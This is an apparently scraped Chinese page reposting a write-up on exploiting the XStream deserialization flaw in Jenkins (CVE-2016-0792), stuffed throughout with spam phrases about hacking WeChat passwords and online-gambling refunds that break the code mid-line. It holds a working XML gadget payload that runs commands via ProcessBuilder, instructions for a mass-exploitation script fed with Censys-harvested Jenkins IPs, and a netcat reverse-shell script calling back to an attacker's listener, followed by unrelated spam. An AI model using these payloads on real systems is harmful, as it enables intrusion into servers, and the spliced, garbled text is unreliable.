黑客如何找回微信密码的软件-网赌退一部分钱的 *** -XStream反序列化漏洞利用之Jenkins(CVE-2016-0792)

网赌退一部分钱的方式-XStream反序列化漏洞利用之Jenkins(CVE-2016-0792)

0x00 背景

 

二零一六年2月26日, 海外安全性研究者公布一篇文章《Serialization Must Die: Act 2: XStream (Jenkins CVE-2016-0792)》。XStream是一个知名的反序列化的库，主要用途普遍，文中创作者以Jenkins为例子结构了一个远程控制代码执行的EXP。

0X01 *** 黑客如何找回微信密码的手机软件 剖析

 

XStream系统漏洞的根本原因取决于Groovy部件的难题，在groovy.util.Expando轻载hashCode方式的情况下出了难题：

 

public int hashCode(){

Object method = *** 黑客如何找回微信密码的手机软件 getProperties().get("hashCode");

if (method != null && method instanceof Closure){

// invoke overridden hashCode closure method

Closure closure = (Closure) method;

*** 黑客如何找回微信密码的手机软件 closure.setDelegate(this);

Integer ret = (Integer) closure.call();

return ret.intValue();

}else{

return super.hashCode();

} *** 黑客如何找回微信密码的手机软件

}

 

当Expando中存有闭包目标时，Expando会应用该方式测算并回到hashCode，殊不知这一闭包目标是可控性的，进而能够实行大家的编码。 

因此创作者得出了EXP，应用XStream分析下边的精彩片段时，会弹出来计算方式： 

<map>

<entry>

<groovy.util.Expando>

*** 黑客如何找回微信密码的手机软件 <expandoProperties>

<entry>

<!--这儿是告知Expando测算hashCode的情况下应用大家的闭包方式--!>

<string>hashCode</string>

*** 黑客如何找回微信密码的手机软件 <org.codehaus.groovy.runtime.MethodClosure>

<delegate class="groovy.util.Expando" reference="../../../.."/>

<!--实行打开计算器的实际操作（自然还可以是其他！）--!>

*** 黑客如何找回微信密码的手机软件 <owner class="java.lang.ProcessBuilder">

<command>

<string>open</string>

<string>/Applications/Calculator. *** 黑客如何找回微信密码的软件app</string>

</command>

<redirectErrorStream>false</redirectErrorStream>

</owner>

*** 黑客如何找回微信密码的手机软件 <resolveStrategy>0</resolveStrategy>

<directive>0</directive>

<parameterTypes/>

<maximumNumberOfParameters>0</maximumNumberOfParameters>

<method>start</method>

</org.codehaus.groovy.runtime.MethodClosure>

</entry>

</expandoProperties>

*** 黑客如何找回微信密码的手机软件 </groovy.util.Expando>

<int>1</int>

</entry>

</map>

EXP实行实际效果如下图：

实行链如 *** 黑客如何找回微信密码的手机软件下：

MapConverter#populateMap() 启用了 HashMap#put() 

HashMap#put() 启用了 Expando#hashCode() 

Expando#hashCode() 启用了 MethodClosure#call() 

MethodClosure#call() 启用了 *** 黑客如何找回微信密码的手机软件 MethodClosure#doCall() 

MethodClosure#doCall() 启用了 InvokerHelper#invokeMethod() 

InvokerHelper#invokeMethod() 启用了 ProcessBuilder#start() 

该EXP的实际意义是我们在MethodClosure#call()中 *** 黑客如何找回微信密码的手机软件实行姿势，传送进来环境污染数据信息，实行随意编码。

大量剖析可参照：

http://drops.wooyun.org/papers/13243

http://zone.wooyun.org/content/25551

0x02 运用

 

由于上边的剖析，小编撰写了以下的大批量运用EXP，如下图：

 

该EXP适用单独IP运用和大批量IP运用.

1. 单独IP地址的运用 *** 以下：

指令文件格式： hackUtils.py -k[IP Address][::command]

Linux自然环境下运用实际效果:

Windows自然环境下运用实际效果：

2. *** 黑客如何找回微信密码的手机软件 大批量IP的运用 *** 以下：

 

该EXP可大批量在有系统漏洞的Jenkins *** 服务器上实行随意指令。我们可以根据 python hackUtils.py -i jenkins 大批量获得Jenkins的IP地址, 运作完毕后你能在当前目录下寻找一个IP目录文档censys.txt.

 

指令文件格式： hackUtils.py -k[IP_list][::command]

注：[IP address]表明单独IP地址，如：10.10.10.10，[::command]表 *** 黑客如何找回微信密码的手机软件示随意实行的指令，如：::dir 或是 ::”touch /tmp/jenkins“,[IP_list]表明IP目录的文档，如：IP.txt

0x03 实战演练

 

为了更好地便捷大伙儿能够更好地了解和应用该EXP，小编出示了一个简易的反跳shell实例。

运用前的提前准备:

1. 一台用以监视的外网服务器：163.**.**.**

2. 一台安裝了该EXP的随意服务器

3. 一台有系统漏洞的Jenkins *** 服务器

之一步， 先在我们自己的攻击网站上打开端口号监视：nc -vv -l 8000

第二步，运用该EXP开展大批量检验，以下大家取得成功找到很 *** 黑客如何找回微信密码的手机软件多系统漏洞未恢复的Jenkins *** 服务器。

第三步， 挑选在其中一个IP做为总体目标 *** 服务器，检测系统漏洞是不是存有，试着一下指令： python hackUtils.py -k[总体目标IP]::”telnet[监视 *** 服务器IP][监视端口号]” *** 黑客如何找回微信密码的手机软件 来检测是不是能够连接。如下图，能够清晰发觉该总体目标 *** 服务器存有系统漏洞，并能够连接进攻服务器的监视端口号。

第四步，在总体目标服务器上实行远程连接命令反跳shell。在这里一步，能够根据该EXP运行命令来反跳shell，还可以运用以下姿态。

更先，运用指令下 *** 黑客如何找回微信密码的手机软件载反跳shell的脚本 *** 至 *** 服务器， 例如：置放以下的反跳shell的脚本 *** 供总体目标服务器下载.

#!/bin/sh

a=$(date %s);

backpipe="backpipe""$a";

mknod /tmp/$backpipe p;

/bin/sh 0</tmp/$backpipe | nc[监视服务器IP] *** 黑客如何找回微信密码的手机软件[监视端口号]1>/tmp/$backpipe;

随后，实行脚本 *** ；最终反跳shell至进攻服务器。

到此，大家早已取得成功地运用该EXP获得来到总体目标 *** 服务器的shell了。

 

脚本 *** 详细地址：https://github.com/brianwrf/hackUtils

*** 黑客怎样找回微信密 码的软件声明：仅作学习使用，任何人不可用于非法目的，否则一切后果由其本人承担!

 

参考:

https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream?platform=hootsuite

http://drops.wooyun.org/papers/13黑客如何找回微信密码的软件243

http://zone.wooyun.org/content/25551

。吉林省国信兴业投资集团有限公司是2006-02-07在吉林省长春市南关区注册成立的有限责任公司(自然人投资或控股的法人独资),注册地址位于长春市南。网赌退一部分钱的 ***

网上黑客合作改单。黑客点击的电子书下载: 用坐标值坚持画,对分析技术很好。我已坚持10年。

网赌退一部分钱的 *** 有,钓鱼软件盗黑客如何找回微信密码的软件号就是最典型的一种 *** ,更好不要在自己不信任的网站或软件上随便输qq号,谨防被盗可以,更好你把你电脑的防火墙打开,然后把所有的端口都关闭了。

是蓝屏背景的英文字吗?这种情况一般是因为某个病毒或者木马在你启动系统的时候就跟着启动,然后出错,所以蓝屏。你可以开机的时候按F8进入安全模式,杀毒。

首先说明我不是黑客大佬此次网站入侵不用工具貌似你就能到后台或许你说的是手工注入更好的老师是百度和谷歌或许你并不想成为一个黑客如何找回微信密码的软件黑客而是好奇,或许。网赌退一部分钱的 ***

英[kr?m]美[kro?m](可肉姆)复制到百度翻译点发音按钮chrome是化学元素铬,google以此命名它的浏览器参考GlenMurphy的说法,此人为chrome的首席设计师,他的回答具有权威性。大意就是:首先,设计之初的研发代号是Chrome,是某些领导的个人喜好。Chrome。

网赌退一部分钱的 *** 。盗号分两类,一类是申诉盗号,一类是社工进行字典破译(速度黑客如何找回微信密码的软件让人怀疑人生)其实还有一种,但是太不常见了,那就是直接黑掉腾讯数据库!

标签：